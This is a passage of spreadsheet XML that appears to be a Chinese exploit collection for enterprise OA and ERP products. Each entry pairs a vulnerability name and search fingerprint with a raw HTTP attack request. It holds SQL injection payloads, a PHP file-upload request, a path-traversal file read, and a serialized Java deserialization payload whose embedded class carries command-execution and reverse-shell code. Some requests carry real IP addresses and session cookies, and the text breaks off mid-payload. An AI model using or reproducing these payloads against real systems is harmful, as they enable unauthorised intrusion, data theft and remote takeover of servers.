    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</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br</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SOAPAction:</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Host:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 192.168.52.168</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Referer:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> http://192.168.52.168:80/services/WorkPlanService</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Cookie:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ecology_JSessionid=aaawzto5mqug94J9Fz0cz</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xmlns:web="webservices.workplan.weaver.com.cn"&gt;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&lt;web:deleteWorkPlan&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;!--type:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> string--&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;web:in0&gt;(SELECT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 8544</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> FROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)&lt;/web:in0&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;!--type:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> int--&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;web:in1&gt;22&lt;/web:in1&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/web:deleteWorkPlan&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soapenv:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soapenv:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>金和OA C6-GeneralXmlhttpPage.aspx SQL注入</t>
  </si>
  <si>
    <t>body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"</t>
  </si>
  <si>
    <t>http://ip/C6/Jhsoft.Web.appraise/GeneralXmlhttpPage.aspx/?type=CheckAppraiseState&amp;id=1*</t>
  </si>
  <si>
    <t>指挥调度管理平台upload_all任意文件上传</t>
  </si>
  <si>
    <t>body="指挥调度管理平台"</t>
  </si>
  <si>
    <t>POST /api/yl_client/gps_location/upload_all.php HTTP/1.1
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryo4PcEwYJ2kc2XBYv
Sec-Fetch-Dest: empty
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Token: 4EE14A57C12E13071C7CD45F162B0790
Cookie: PHPSESSID=reg5ohg0i86279729lt1o0tc76; authcode=qudz
Cookie: 
Sec-Fetch-Site: cross-site
------WebKitFormBoundaryo4PcEwYJ2kc2XBYv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
&lt;?php phpinfo();?&gt;
------WebKitFormBoundaryo4PcEwYJ2kc2XBYv--</t>
  </si>
  <si>
    <t>用友时空KSOA PreviewKPQT SQL注入</t>
  </si>
  <si>
    <t>app="用友-时空KSOA"</t>
  </si>
  <si>
    <t>GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>华天动力 OA downloadWpsFile任意文件读取</t>
  </si>
  <si>
    <t>app:"华天动力 OA"</t>
  </si>
  <si>
    <t>/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>JeePlus快速开发平台resetpassword存在SQL注入</t>
  </si>
  <si>
    <t>app="JeePlus"</t>
  </si>
  <si>
    <t>GET /a/sys/user/validateMobile?&amp;mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close</t>
  </si>
  <si>
    <t>帆软报表 FineVis数据可视化插件 任意文件写入漏洞</t>
  </si>
  <si>
    <t>广联达 Linkworks 远程代码执行</t>
  </si>
  <si>
    <t>宝兰德应用中间件BES反序列化漏洞</t>
  </si>
  <si>
    <t>向日葵远程RCE（都在传）</t>
  </si>
  <si>
    <t>金山 V9 终端安全系统sql注入</t>
  </si>
  <si>
    <t>方天云-GetCompanyItem-sql注入</t>
  </si>
  <si>
    <t>body="AjaxMethods.asmx/GetCompanyItem"</t>
  </si>
  <si>
    <t>POST /AjaxMethods.asmx/GetCompanyItem HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 41
Origin: http://140.246.66.11:8088
Connection: close
Referer: http://140.246.66.11:8088/
{cusNumber:"1' and 1=user--+"}</t>
  </si>
  <si>
    <t>用友NC UserAuthenticationServlet 反序列化RCE</t>
  </si>
  <si>
    <t>app="用友-UFIDA-NC"</t>
  </si>
  <si>
    <t>yakit生成序列化数据，cc6打dns
tomcat回显链
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
Host: 
Cmd: id
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x07sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x16getDeclaredConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00\x02A4ur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x1b\xbb\xca\xfe\xba\xbe\x00\x00\x001\x01\x9a\x0a\x00\x1e\x00\xad\x0a\x00C\x00\xae\x0a\x00C\x00\xaf\x0a\x00\x1e\x00\xb0\x08\x00\xb1\x0a\x00\x1c\x00\xb2\x0a\x00\xb3\x00\xb4\x0a\x00\xb3\x00\xb5\x07\x00\xb6\x0a\x00C\x00\xb7\x08\x00\xa5\x0a\x00!\x00\xb8\x08\x00\xb9\x08\x00\xba\x07\x00\xbb\x08\x00\xbc\x08\x00\xbd\x07\x00\xbe\x0a\x00\x1c\x00\xbf\x08\x00\xc0\x08\x00\xc1\x07\x00\xc2\x0b\x00\x16\x00\xc3\x0b\x00\xc4\x00\xc5\x0b\x00\xc4\x00\xc6\x08\x00\xc7\x08\x00\xc8\x07\x00\xc9\x0a\x00\x1c\x00\xca\x07\x00\xcb\x0a\x00\xcc\x00\xcd\x08\x00\xce\x07\x00\xcf\x08\x00\xd0\x0a\x00\x8f\x00\xd1\x0a\x00!\x00\xd2\x08\x00\xd3\x09\x00\xd4\x00\xd5\x0a\x00\xd4\x00\xd6\x08\x00\xd7\x0a\x00\x8f\x00\xd8\x0a\x00\x1c\x00\xd9\x08\x00\xda\x07\x00\xdb\x0a\x00\x1c\x00\xdc\x08\x00\xdd\x07\x00\xde\x08\x00\xdf\x08\x00\xe0\x0a\x00\x1c\x00\xe1\x07\x00\xe2\x0a\x00C\x00\xe3\x0a\x00\xe4\x00\xd8\x08\x00\xe5\x0a\x00!\x00\xe6\x08\x00\xe7\x0a\x00!\x00\xe8\x08\x00\xe9\x0a\x00!\x00\xea\x0a\x00\x8f\x00\xeb\x08\x00\xec\x0a\x00!\x00\xed\x08\x00\xee\x09\x00\x8f\x00\xef\x0a\x00\xd4\x00\xf0\x09\x00\x8f\x00\xf1\x07\x00\xf2\x0a\x00C\x00\xf3\x0a\x00C\x00\xf4\x08\x00\xa6\x08\x00\xf5\x08\x00\xf6\x0a\x00\x8f\x00\xf7\x08\x00\xf8\x0a\x00\x8f\x00\xf9\x07\x00\xfa\x0a\x00L\x00\xfb\x07\x00\xfc\x0a\x00N\x00\xfd\x0a\x00\x8f\x00\xfe\x0a\x00N\x00\xff\x0a\x00N\x01\x00\x0a\x00N\x01\x01\x0a\x00/\x01\x02\x0a\x00L\x01\x03\x0a\x00!\x01\x04\x08\x01\x05\x0a\x01\x06\x01\x07\x0a\x00!\x01\x08\x08\x01\x09\x08\x01\x0a\x08\x01\x0b\x07\x01\x0c\x0a\x00]\x00\xad\x0a\x00]\x01\x0d\x08\x01\x0e\x0a\x00]\x01\x02\x08\x01\x0f\x08\x01\x10\x08\x01\x11\x08\x01\x12\x0a\x01\x13\x01\x14\x0a\x01\x13\x01\x15\x07\x01\x16\x0a\x01\x17\x01\x18\x0a\x00h\x01\x19\x08\x01\x1a\x0a\x00h\x01\x1b\x0a\x00h\x00\xc5\x0a\x00h\x01\x1c\x0a\x01\x17\x01\x1d\x0a\x01\x17\x01\x1e\x08\x01\x1f\x08\x01 \x0a\x01\x13\x01!\x07\x01\"\x0a\x00t\x01#\x0a\x00t\x01\x18\x0a\x01\x17\x01$\x0a\x00t\x01$\x0a\x00t\x01%\x0a\x01&amp;\x01'\x0a\x01&amp;\x01\x28\x0a\x01\x29\x01*\x0a\x01\x29\x01\x00\x05\x00\x00\x00\x00\x00\x00\x002\x0a\x00C\x01+\x0a\x01\x17\x01,\x0a\x00t\x01\x01\x08\x01-\x0a\x00/\x01.\x08\x01/\x08\x010\x0a\x00\xd4\x011\x0a\x00\x8f\x012\x08\x013\x08\x014\x08\x015\x08\x016\x08\x00\xa9\x08\x017\x07\x018\x01\x00\x0cBASE64_CHARS\x01\x00\x12Ljava/lang/String;\x01\x00\x0dConstantValue\x08\x019\x01\x00\x02ip\x01\x00\x04port\x01\x00\x13Ljava/lang/Integer;\x01\x00\x06&lt;init&gt;\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x0aExceptions\x01\x00\x09loadClass\x01\x00%\x28Ljava/lang/String;\x29Ljava/lang/Class;\x01\x00\x09Signature\x01\x00\x28\x28Ljava/lang/String;\x29Ljava/lang/Class&lt;*&gt;;\x01\x00\x05proxy\x01\x00&amp;\x28Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x05write\x01\x008\x28Ljava/lang/String;Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x0aclearParam\x01\x00\x04exec\x01\x00\x07reverse\x01\x00'\x28Ljava/lang/String;I\x29Ljava/lang/String;\x01\x00\x03run\x01\x00\x06decode\x01\x00\x16\x28Ljava/lang/String;\x29[B\x01\x00\x0aSourceFile\x01\x00\x07A4.java\x0c\x00\x97\x00\x98\x0c\x01:\x01;\x0c\x01&lt;\x01=\x0c\x01&gt;\x01?\x01\x00\x07threads\x0c\x01@\x01A\x07\x01B\x0c\x01C\x01D\x0c\x01E\x01F\x01\x00\x13[Ljava/lang/Thread;\x0c\x01G\x01H\x0c\x01I\x01J\x01\x00\x04http\x01\x00\x06target\x01\x00\x12java/lang/Runnable\x01\x00\x06this$0\x01\x00\x07handler\x01\x00\x1ejava/lang/NoSuchFieldException\x0c\x01K\x01?\x01\x00\x06global\x01\x00\x0aprocessors\x01\x00\x0ejava/util/List\x0c\x01L\x01M\x07\x01N\x0c\x01O\x01P\x0c\x01Q\x01R\x01\x00\x03req\x01\x00\x0bgetResponse\x01\x00\x0fjava/lang/Class\x0c\x01S\x01T\x01\x00\x10java/lang/Object\x07\x01U\x0c\x01V\x01W\x01\x00\x09getHeader\x01\x00\x10java/lang/String\x01\x00\x03cmd\x0c\x00\xa0\x00\xa1\x0c\x01X\x01Y\x01\x00\x09setStatus\x07\x01Z\x0c\x01[\x01\\\x0c\x01]\x01^\x01\x00$org.apache.tomcat.util.buf.ByteChunk\x0c\x00\x9c\x00\x9d\x0c\x01_\x01R\x01\x00\x08setBytes\x01\x00\x02[B\x0c\x01`\x01T\x01\x00\x07doWrite\x01\x00\x13java/lang/Exception\x01\x00\x13java.nio.ByteBuffer\x01\x00\x04wrap\x0c\x01a\x00\x9d\x01\x00 java/lang/ClassNotFoundException\x0c\x01b\x01c\x07\x01d\x01\x00\x00\x0c\x01e\x01f\x01\x00\x10command not null\x0c\x01g\x01H\x01\x00\x05#####\x0c\x01h\x01i\x0c\x00\xa4\x00\xa1\x01\x00\x01:\x0c\x01j\x01k\x01\x00\"command reverse host format error!\x0c\x00\x94\x00\x91\x0c\x01l\x01m\x0c\x00\x95\x00\x96\x01\x00\x10java/lang/Thread\x0c\x00\x97\x01n\x0c\x01o\x00\x98\x01\x00\x05$$$$$\x01\x00\x12file format error!\x0c\x00\xa2\x00\xa3\x01\x00\x05@@@@@\x0c\x00\xa5\x00\xa1\x01\x00\x0cjava/io/File\x0c\x00\x97\x01p\x01\x00\x18java/io/FileOutputStream\x0c\x00\x97\x01q\x0c\x00\xa9\x00\xaa\x0c\x00\xa2\x01r\x0c\x01s\x00\x98\x0c\x01t\x00\x98\x0c\x01u\x01H\x0c\x01v\x01H\x0c\x01w\x01x\x01\x00\x07os.name\x07\x01y\x0c\x01z\x00\xa1\x0c\x01\x7b\x01H\x01\x00\x03win\x01\x00\x04ping\x01\x00\x02-n\x01\x00\x17java/lang/StringBuilder\x0c\x01|\x01\x7d\x01\x00\x05 -n 4\x01\x00\x02/c\x01\x00\x05 -t 4\x01\x00\x02sh\x01\x00\x02-c\x07\x01~\x0c\x01\x7f\x01\x80\x0c\x00\xa5\x01\x81\x01\x00\x11java/util/Scanner\x07\x01\x82\x0c\x01\x83\x01\x84\x0c\x00\x97\x01\x85\x01\x00\x02\\a\x0c\x01\x86\x01\x87\x0c\x01Q\x01H\x0c\x01\x88\x01\x84\x0c\x01\x89\x00\x98\x01\x00\x07/bin/sh\x01\x00\x07cmd.exe\x0c\x00\xa5\x01\x8a\x01\x00\x0fjava/net/Socket\x0c\x00\x97\x01\x8b\x0c\x01\x8c\x01\x8d\x0c\x01\x8e\x01P\x07\x01\x8f\x0c\x01\x90\x01\x91\x0c\x01\x92\x01\x91\x07\x01\x93\x0c\x00\xa2\x01\x94\x0c\x01\x95\x01\x96\x0c\x01\x97\x01\x91\x01\x00\x1dreverse execute error, msg -&gt;\x0c\x01\x98\x01H\x01\x00\x01!\x01\x00\x13reverse execute ok!\x0c\x01\x99\x01\x91\x0c\x00\xa6\x00\xa7\x01\x00\x16sun.misc.BASE64Decoder\x01\x00\x0cdecodeBuffer\x01\x00\x10java.util.Base64\x01\x00\x0agetDecoder\x01\x00&amp;org.apache.commons.codec.binary.Base64\x01\x00\x02A4\x01\x00@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x01\x00\x17java/lang/reflect/Field\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x01\x00\x03get\x01\x00&amp;\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x01\x00\x0dgetSuperclass\x01\x00\x08iterator\x01\x00\x16\x28\x29Ljava/util/Iterator;\x01\x00\x12java/util/Iterator\x01\x00\x07hasNext\x01\x00\x03\x28\x29Z\x01\x00\x04next\x01\x00\x14\x28\x29Ljava/lang/Object;\x01\x00\x09getMethod\x01\x00@\x28Ljava/lang/String;[Ljava/lang/Class;\x29Ljava/lang/reflect/Method;\x01\x00\x18java/lang/reflect/Method\x01\x00\x06invoke\x01\x009\x28Ljava/lang/Object;[Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x08getBytes\x01\x00\x04\x28\x29[B\x01\x00\x11java/lang/Integer\x01\x00\x04TYPE\x01\x00\x11Ljava/lang/Class;\x01\x00\x07valueOf\x01\x00\x16\x28I\x29Ljava/lang/Integer;\x01\x00\x0bnewInstance\x01\x00\x11getDeclaredMethod\x01\x00\x07forName\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x01\x00\x15java/lang/ClassLoader\x01\x00\x06equals\x01\x00\x15\x28Ljava/lang/Object;\x29Z\x01\x00\x04trim\x01\x00\x0astartsWith\x01\x00\x15\x28Ljava/lang/String;\x29Z\x01\x00\x05split\x01\x00'\x28Ljava/lang/String;\x29[Ljava/lang/String;\x01\x00\x08parseInt\x01\x00\x15\x28Ljava/lang/String;\x29I\x01\x00\x17\x28Ljava/lang/Runnable;\x29V\x01\x00\x05start\x01\x00\x15\x28Ljava/lang/String;\x29V\x01\x00\x11\x28Ljava/io/File;\x29V\x01\x00\x05\x28[B\x29V\x01\x00\x05flush\x01\x00\x05close\x01\x00\x08toString\x01\x00\x0fgetAbsolutePath\x01\x00\x07replace\x01\x00D\x28Ljava/lang/CharSequence;Ljava/lang/CharSequence;\x29Ljava/lang/String;\x01\x00\x10java/lang/System\x01\x00\x0bgetProperty\x01\x00\x0btoLowerCase\x01\x00\x06append\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/StringBuilder;\x01\x00\x11java/lang/Runtime\x01\x00\x0agetRuntime\x01\x00\x15\x28\x29Ljava/lang/Runtime;\x01\x00\x28\x28[Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x11java/lang/Process\x01\x00\x0egetInputStream\x01\x00\x17\x28\x29Ljava/io/InputStream;\x01\x00\x18\x28Ljava/io/InputStream;\x29V\x01\x00\x0cuseDelimiter\x01\x00'\x28Ljava/lang/String;\x29Ljava/util/Scanner;\x01\x00\x0egetErrorStream\x01\x00\x07destroy\x01\x00'\x28Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x16\x28Ljava/lang/String;I\x29V\x01\x00\x0fgetOutputStream\x01\x00\x18\x28\x29Ljava/io/OutputStream;\x01\x00\x08isClosed\x01\x00\x13java/io/InputStream\x01\x00\x09available\x01\x00\x03\x28\x29I\x01\x00\x04read\x01\x00\x14java/io/OutputStream\x01\x00\x04\x28I\x29V\x01\x00\x05sleep\x01\x00\x04\x28J\x29V\x01\x00\x09exitValue\x01\x00\x0agetMessage\x01\x00\x08intValue\x00!\x00\x8f\x00\x1e\x00\x01\x00\x0f\x00\x03\x00\x1a\x00\x90\x00\x91\x00\x01\x00\x92\x00\x00\x00\x02\x00\x93\x00\x02\x00\x94\x00\x91\x00\x00\x00\x02\x00\x95\x00\x96\x00\x00\x00\x09\x00\x01\x00\x97\x00\x98\x00\x02\x00\x99\x00\x00\x03\xb6\x00\x06\x00\x13\x00\x00\x02\x8e*\xb7\x00\x01\xb8\x00\x02\xb6\x00\x03L+\xb6\x00\x04\x12\x05\xb6\x00\x06M,\x04\xb6\x00\x07,+\xb6\x00\x08\xc0\x00\x09\xc0\x00\x09N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x02X\x19\x04\x15\x062:\x07\x19\x07\xc7\x00\x06\xa7\x02C\x19\x07\xb6\x00\x0a:\x08\x19\x08\x12\x0b\xb6\x00\x0c\x9a\x00\x0d\x19\x08\x12\x0d\xb6\x00\x0c\x9a\x00\x06\xa7\x02%\x19\x07\xb6\x00\x04\x12\x0e\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x07\xb6\x00\x08:\x09\x19\x09\xc1\x00\x0f\x9a\x00\x06\xa7\x02\x02\x19\x09\xb6\x00\x04\x12\x10\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x11\xb6\x00\x06M\xa7\x00\x16:\x0a\x19\x09\xb6\x00\x04\xb6\x00\x13\xb6\x00\x13\x12\x11\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\xb6\x00\x13\x12\x14\xb6\x00\x06M\xa7\x00\x10:\x0a\x19\x09\xb6\x00\x04\x12\x14\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x15\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08\xc0\x00\x16\xc0\x00\x16:\x0a\x19\x0a\xb9\x00\x17\x01\x00:\x0b\x19\x0b\xb9\x00\x18\x01\x00\x99\x01[\x19\x0b\xb9\x00\x19\x01\x00:\x0c\x19\x0c\xb6\x00\x04\x12\x1a\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x0c\xb6\x00\x08:\x0d\x19\x0d\xb6\x00\x04\x12\x1b\x03\xbd\x00\x1c\xb6\x00\x1d\x19\x0d\x03\xbd\x00\x1e\xb6\x00\x1f:\x0e\x19\x0d\xb6\x00\x04\x12 \x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d\x19\x0d\x04\xbd\x00\x1eY\x03\x12\"S\xb6\x00\x1f\xc0\x00!:\x0f\x19\x0f\xc7\x00\x06\xa7\xff\x91*\x19\x0f\xb6\x00#\xb6\x00$:\x10\x19\x0e\xb6\x00\x04\x12%\x04\xbd\x00\x1cY\x03\xb2\x00&amp;S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x11\x00\xc8\xb8\x00'S\xb6\x00\x1fW*\x12\x28\xb6\x00\x29:\x11\x19\x11\xb6\x00*:\x09\x19\x11\x12+\x06\xbd\x00\x1cY\x03\x12,SY\x04\xb2\x00&amp;SY\x05\xb2\x00&amp;S\xb6\x00-\x19\x09\x06\xbd\x00\x1eY\x03\x19\x10SY\x04\x03\xb8\x00'SY\x05\x19\x10\xbe\xb8\x00'S\xb6\x00\x1fW\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x11S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00O:\x11*\x120\xb6\x00\x29:\x12\x19\x12\x121\x04\xbd\x00\x1cY\x03\x12,S\xb6\x00-\x19\x12\x04\xbd\x00\x1eY\x03\x19\x10S\xb6\x00\x1f:\x09\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x12S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00\x0e\xa7\x00\x05:\x08\x84\x06\x01\xa7\xfd\xa7\xb1\x00\x07\x00\xa0\x00\xab\x00\xae\x00\x12\x00\xce\x00\xdc\x00\xdf\x00\x12\x01\xc4\x020\x023\x00/\x00?\x00D\x02\x85\x00/\x00G\x00b\x02\x85\x00/\x00e\x00\x85\x02\x85\x00/\x00\x88\x02\x7f\x02\x85\x00/\x00\x01\x00\x9a\x00\x00\x00\xde\x007\x00\x00\x00\x17\x00\x04\x00\x18\x00\x0b\x00\x19\x00\x15\x00\x1a\x00\x1a\x00\x1b\x00&amp;\x00\x1d\x00?\x00\x1f\x00G\x00 \x00N\x00!\x00e\x00\"\x00p\x00#\x00u\x00$\x00\x7d\x00%\x00\x88\x00&amp;\x00\x93\x00'\x00\x98\x00\x28\x00\xa0\x00*\x00\xab\x00-\x00\xae\x00+\x00\xb0\x00,\x00\xc1\x00.\x00\xc6\x00/\x00\xce\x001\x00\xdc\x004\x00\xdf\x002\x00\xe1\x003\x00\xec\x005\x00\xf1\x006\x00\xf9\x007\x01\x04\x008\x01\x09\x009\x01\x17\x00:\x013\x00;\x01&gt;\x00&lt;\x01C\x00=\x01K\x00&gt;\x01d\x00?\x01\x8a\x00@\x01\x8f\x00A\x01\x92\x00C\x01\x9d\x00D\x01\xc4\x00F\x01\xcc\x00G\x01\xd3\x00H\x02\x0e\x00I\x020\x00N\x023\x00J\x025\x00K\x02=\x00L\x02]\x00M\x02\x7f\x00O\x02\x82\x00S\x02\x85\x00Q\x02\x87\x00\x1d\x02\x8d\x00U\x00\x9b\x00\x00\x00\x04\x00\x01\x00/\x00\x01\x00\x9c\x00\x9d\x00\x03\x00\x99\x00\x00\x009\x00\x02\x00\x03\x00\x00\x00\x11+\xb8\x002\xb0M\xb8\x00\x02\xb6\x004+\xb6\x005\xb0\x00\x01\x00\x00\x00\x04\x00\x05\x003\x00\x01\x00\x9a\x00\x00\x00\x0e\x00\x03\x00\x00\x00_\x00\x05\x00`\x00\x06\x00a\x00\x9b\x00\x00\x00\x04\x00\x01\x003\x00\x9e\x00\x00\x00\x02\x00\x9f\x00\x01\x00\xa0\x00\xa1\x00\x0